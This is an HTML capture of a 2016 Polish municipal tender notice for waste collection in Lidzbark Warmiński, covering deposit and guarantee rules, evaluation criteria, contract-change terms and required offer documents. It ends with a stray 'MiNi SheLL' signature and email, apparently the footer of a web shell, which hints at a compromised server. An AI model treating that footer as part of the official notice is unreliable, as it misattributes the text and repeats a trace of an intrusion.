a)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu  Miejskiego w  Lidzbarku Warmińskim 
w Banku Millennium S.A. Nr  13116022020000000061931481,
 z dopiskiem: Wadium  odbiór odpadów komunalnych.
Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. rachunku  przed terminem składania ofert. Kopię potwierdzenia wniesienia wadium poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
 b) W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię 
     dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 
     Ponadto do oferty należy dołączyć, w osobnej koszulce, oryginał tego dokumentu. Nie 
     bindować i nie zszywać z ofertą. 
5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, 
    dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać 
    następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	kwotę gwarancji lub poręczenia,
d)	termin ważności gwarancji lub poręczenia,
e)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
	odmówił podpisania umowy na warunkach określonych w ofercie, lub
	nie wniósł zabezpieczenia należytego wykonania umowy, lub
	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
f)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej,                   o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
g)	gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe. Gwarancja lub poręczenie winny przewidywać termin bezwarunkowej wypłaty maksymalnie do 21 dni od pierwszego pisemnego żądania wypłaty wadium,
h)	wszelkie spory dotyczące gwarancji lub poręczenia podlegają rozstrzygnięciu zgodnie  z prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego.
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji lub poręczenia nie był krótszy niż okres związania ofertą.
j)	w przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się            o udzielenie niniejszego zamówienia Zamawiający uzna wadium za wniesione skutecznie, o ile odpowiadać będzie postanowieniom niniejszej specyfikacji istotnych warunków zamówienia oraz wniesione zostało przez jednego                            z wykonawców wspólnie ubiegających się o udzielenie zamówienia w wymaganej wysokości i wymaganym terminie.
6. Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji Istotnych 
    Warunków Zamówienia, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt 
    2 ustawy  Prawo zamówień publicznych. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
    została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
8. Zamawiający zatrzymuje również wadium wraz z odsetkami w przypadku określonym
    w art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty    
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. 
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca 
     wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz 
     wniesieniu zabezpieczenia należytego wykonania umowy.
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę 
     przed upływem terminu składania ofert.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Liczba zbiórek odpadów wielkogabarytowych</td><td>30</td></tr><tr><td>Przeprowadzenie akcji promocyjno-informacyjnej</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, a w szczególności, gdy:
1) wystąpią okoliczności niezależne od Wykonawcy uniemożliwiające realizację 
        przedmiotu umowy w terminie, termin realizacji przedmiotu umowy może ulec 
        wydłużeniu o okres trwania tych okoliczności lub o czas niezbędny do należytego 
        wykonania przedmiotu umowy;
    2) w trakcie trwania niniejszej umowy nastąpi zmiana przepisów określających 
        wysokość należnego podatku VAT na usługi lub dostawy objęte przedmiotem 
        zamówienia, Wykonawca zastosuje obowiązujący podatek VAT, co skutkować będzie 
        zmianą cen jednostkowych usług lub dostaw  w zakresie odpowiadającym zmianie 
        wysokości stawki obowiązującego podatku VAT;
    3) nastąpi zmiana przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu 
        umowy;
    4) wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, 
        których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie 
        rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów 
        przez Strony;    
    5) wystąpi uzasadniona przyczynami technicznymi konieczność zmiany sposobu 
        wykonania umowy; 
    6) wystąpi siła wyższa, co uniemożliwia wykonanie przedmiotu umowy zgodnie z SIWZ; 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/12/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferty muszą być sporządzone w języku polskim.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Kompletna oferta musi zawierać:
a)	Formularz Oferty, sporządzony według wzoru stanowiącego załącznik nr 1              do niniejszej SIWZ,
b)	Dokumenty i oświadczenia wymienione w Części VII niniejszej SIWZ,
c)	Wypełniony formularz cenowy, sporządzony wg wzoru określonego w załączniku nr 2 do niniejszej SIWZ,
d)	Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
e ) 	Kopię dowodu wniesienia wadium.
 f) Zobowiązanie podmiotu trzeciego albo inny dokument służący wykonawcy wykazaniu 
potencjału podmiotu trzeciego, w zakresie określonym w art. 22a ust. 1 ustawy Pzp  
w przypadku, gdy wykonawca przy wykazaniu spełnienia warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów. 
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com